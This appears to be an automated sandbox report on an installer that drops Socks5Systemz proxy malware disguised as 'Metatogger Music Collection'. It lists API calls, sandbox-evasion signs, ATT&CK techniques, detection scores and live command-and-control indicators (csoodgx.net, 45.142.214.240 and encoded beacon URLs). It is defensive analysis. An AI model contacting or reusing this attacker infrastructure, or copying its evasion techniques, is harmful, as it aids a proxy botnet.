        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,4_2_00401B4B
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,4_2_02ADF8DA
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeWindow / User API: threadDelayed 5533Jump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeWindow / User API: threadDelayed 4293Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\is-JTEEN.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_RegDLL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\is-7CP2O.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\libwinpthread-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_isdecmp.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\libvorbis-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\is-OSHRA.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\is-B2M6R.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\libogg-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\is-QO8P8.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\libbz2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-6443
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-2438
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe TID: 6472Thread sleep count: 5533 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe TID: 6472Thread sleep time: -11066000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe TID: 6772Thread sleep count: 85 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe TID: 6772Thread sleep time: -5100000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe TID: 6472Thread sleep count: 4293 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe TID: 6472Thread sleep time: -8586000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0047A44C FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_0047A44C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0047077C FindFirstFileA,FindNextFileA,FindClose,1_2_0047077C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004513E4 FindFirstFileA,GetLastError,1_2_004513E4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004601DC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_004601DC
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00478334 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_00478334
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00460658 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00460658
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0045EC50 FindFirstFileA,FindNextFileA,FindClose,1_2_0045EC50
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00491EBC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00491EBC
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409A14 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409A14
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeThread delayed: delay time: 60000Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile opened: C:\Users\user\AppDataJump to behavior
        Source: metatoggermusiccollection.exe, 00000004.00000002.3216869641.0000000003350000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW72&}
        Source: metatoggermusiccollection.exe, 00000004.00000002.3216869641.0000000003350000.00000004.00000020.00020000.00000000.sdmp, metatoggermusiccollection.exe, 00000004.00000002.3215694991.0000000000788000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: file.tmp, 00000001.00000002.3215818794.0000000000797000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8
        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-6301
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeAPI call chain: ExitProcess graph end nodegraph_4-20040
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AF00FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,4_2_02AF00FE
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AF00FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,4_2_02AF00FE
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00447DC0 LoadLibraryExA,LoadLibraryA,GetProcAddress,1_2_00447DC0
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AD6487 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,4_2_02AD6487
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AE9468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_02AE9468
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004734AC ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_004734AC
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0045AEE4 GetVersion,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,AllocateAndInitializeSid,GetLastError,LocalFree,1_2_0045AEE4
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AE7FAD cpuid 4_2_02AE7FAD
        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0040515C
        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_004051A8
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: GetLocaleInfoA,1_2_004084D0
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: GetLocaleInfoA,1_2_0040851C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004569D4 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004569D4
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00453D04 GetUserNameA,1_2_00453D04
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405C44 GetVersionExA,0_2_00405C44

        Stealing of Sensitive Information

        barindex
        Yara detected Socks5Systemz
        Source: Yara matchFile source: 00000004.00000002.3216353053.00000000025B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: metatoggermusiccollection.exe PID: 6408, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Socks5Systemz
        Source: Yara matchFile source: 00000004.00000002.3216353053.00000000025B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: metatoggermusiccollection.exe PID: 6408, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
        Native API        		1
        DLL Side-Loading        		1
        Exploitation for Privilege Escalation        		1
        Deobfuscate/Decode Files or Information        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		2
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts2
        Service Execution        		4
        Windows Service        		1
        DLL Side-Loading        		3
        Obfuscated Files or Information        		LSASS Memory1
        Account Discovery        		Remote Desktop ProtocolData from Removable Media2
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        Bootkit        		1
        Access Token Manipulation        		22
        Software Packing        		Security Account Manager3
        File and Directory Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook4
        Windows Service        		1
        DLL Side-Loading        		NTDS35
        System Information Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
        Process Injection        		1
        Masquerading        		LSA Secrets41
        Security Software Discovery        		SSHKeylogging12
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
        Virtualization/Sandbox Evasion        		Cached Domain Credentials21
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Access Token Manipulation        		DCSync11
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
        Process Injection        		Proc Filesystem3
        System Owner/User Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Bootkit        		/etc/passwd and /etc/shadow1
        Remote System Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
        System Network Configuration Discovery        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        file.exe8%VirustotalBrowse
        file.exe100%AviraHEUR/AGEN.1332570

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\is-7CP2O.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\is-JTEEN.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\is-OSHRA.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\is-QO8P8.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\libbz2-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\libgcc_s_dw2-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\libogg-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\libvorbis-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\libwinpthread-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_RegDLL.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_iscrypt.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_isdecmp.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_setup64.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_shfoldr.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.remobjects.com/psU0%URL Reputationsafe
        http://www.remobjects.com/psU0%URL Reputationsafe
        http://www.remobjects.com/ps0%URL Reputationsafe
        http://www.innosetup.com/0%Avira URL Cloudsafe
        http://csoodgx.net/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f140%Avira URL Cloudsafe
        http://45.142.214.240/0%Avira URL Cloudsafe
        http://vovsoft.com0%Avira URL Cloudsafe
        https://vovsoft.com/newsletter/0%Avira URL Cloudsafe
        http://www.openssl.org).0%Avira URL Cloudsafe
        https://vovsoft.com/contact/.0%Avira URL Cloudsafe
        http://45.142.214.240/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995860%Avira URL Cloudsafe
        http://www.innosetup.com/1%VirustotalBrowse
        http://vovsoft.com0%VirustotalBrowse
        http://csoodgx.net/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ef9093390%Avira URL Cloudsafe
        https://vovsoft.com/contact/0%Avira URL Cloudsafe
        https://vovsoft.com/contact/.0%VirustotalBrowse
        http://45.142.214.240/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df0%Avira URL Cloudsafe
        https://vovsoft.com/newsletter/0%VirustotalBrowse
        https://vovsoft.com/contact/0%VirustotalBrowse
        http://45.142.214.240/8%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        csoodgx.net
        		45.142.214.240
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://csoodgx.net/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14true
          • Avira URL Cloud: safe
          		unknown
          http://csoodgx.net/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ef909339true
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.innosetup.com/file.tmp, file.tmp, 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-B2M6R.tmp.1.dr, file.tmp.0.drfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://45.142.214.240/metatoggermusiccollection.exe, 00000004.00000002.3215694991.0000000000871000.00000004.00000020.00020000.00000000.sdmpfalse
          • 8%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.remobjects.com/psUfile.exe, 00000000.00000003.1970235248.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1970371645.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-B2M6R.tmp.1.dr, file.tmp.0.drfalse
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://vovsoft.comfile.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://vovsoft.com/newsletter/file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://mingw-w64.sourceforge.net/Xis-QO8P8.tmp.1.drfalse
            		high
            http://www.openssl.org).file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		low
            https://vovsoft.com/contact/.file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.remobjects.com/psfile.exe, 00000000.00000003.1970235248.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1970371645.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-B2M6R.tmp.1.dr, file.tmp.0.drfalse
            • URL Reputation: safe
            		unknown
            http://45.142.214.240/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e99586metatoggermusiccollection.exe, 00000004.00000002.3216869641.0000000003390000.00000004.00000020.00020000.00000000.sdmp, metatoggermusiccollection.exe, 00000004.00000002.3216976399.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, metatoggermusiccollection.exe, 00000004.00000002.3215694991.0000000000832000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://vovsoft.com/contact/file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://45.142.214.240/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82dfmetatoggermusiccollection.exe, 00000004.00000002.3215694991.0000000000871000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            45.142.214.240
            		csoodgx.netRussian Federation
            		200019ALEXHOSTMDtrue
            89.105.201.183
            		unknownNetherlands
            		24875NOVOSERVE-ASNLfalse

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1417474
            Start date and time:2024-03-29 12:08:05 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 54s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
